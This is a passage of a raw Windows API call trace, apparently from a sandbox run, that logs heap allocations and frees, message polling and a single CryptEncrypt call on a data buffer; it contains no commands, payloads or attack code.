0x2e54f98 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a78 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0250.089] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0250.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0250.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0250.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51b98 [0250.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0250.090] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f21f10*, pdwDataLen=0x8cef60*=0x6f77, dwBufLen=0x6f78 | out: pbData=0x2f21f10*, pdwDataLen=0x8cef60*=0x6f78) returned 1 [0250.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0250.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0250.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0250.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0250.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0250.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0250.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0250.092] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0250.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0250.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0250.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0250.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0250.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0250.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0250.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0250.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0250.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0250.216] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0250.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0250.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0250.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0250.216] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0250.217] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0250.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.217] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0250.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0250.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0250.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0250.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0250.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51850 [0250.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0250.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0250.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0250.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0250.218] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0250.218] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0250.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0250.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0250.219] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0250.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0250.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0250.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.219] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0250.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0250.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0250.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0250.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0250.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0250.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0250.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0250.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0250.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0250.220] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0250.220] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0250.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0250.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0250.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f78) returned 0x2f28e90 [0250.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0250.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0250.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f78) returned 0x2f36d90 [0250.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28e90 | out: hHeap=0x970000) returned 1 [0250.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0250.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0250.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f78) returned 0x2f28e90 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36d90 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0250.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f78) returned 0x2f36d90 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28e90 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0250.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0250.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0250.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0250.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21f10 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0250.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1af90 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0250.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2fe10 | out: hHeap=0x970000) returned 1 [0250.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0250.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0250.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: 